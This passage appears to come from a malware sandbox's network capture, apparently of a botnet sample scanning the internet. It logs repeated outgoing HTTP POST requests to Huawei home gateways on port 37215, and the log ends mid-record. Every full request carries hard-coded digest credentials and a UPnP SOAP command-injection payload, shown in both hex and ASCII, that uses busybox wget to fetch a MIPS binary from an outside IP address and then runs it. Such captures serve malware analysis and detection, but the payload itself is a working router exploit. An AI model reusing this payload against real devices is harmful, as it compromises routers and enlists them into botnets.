                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            995192.168.2.1341404197.147.94.24837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.441989899 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            996192.168.2.1334414197.119.48.9137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.443084955 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            997192.168.2.134674841.45.154.17937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.444572926 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            998192.168.2.1335852156.41.42.11037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.447664022 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            999192.168.2.1359198197.87.143.1137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.449470997 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1000192.168.2.1359130156.59.146.3937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.451314926 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1001192.168.2.1360004197.248.89.6537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.453325987 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1002192.168.2.1335130197.138.186.5437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.454916954 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1003192.168.2.1351174197.154.179.2037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.456506014 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1004192.168.2.133589441.135.54.14437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.457572937 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
